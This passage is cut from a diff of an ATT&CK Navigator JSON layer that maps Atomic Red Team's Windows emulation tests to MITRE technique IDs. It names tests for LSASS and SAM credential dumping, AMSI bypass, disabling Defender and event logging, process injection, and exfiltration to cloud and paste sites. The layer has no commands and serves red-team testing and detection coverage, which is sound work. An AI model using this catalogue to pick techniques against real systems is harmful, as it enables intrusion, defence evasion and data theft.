Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator 
Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM 
Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
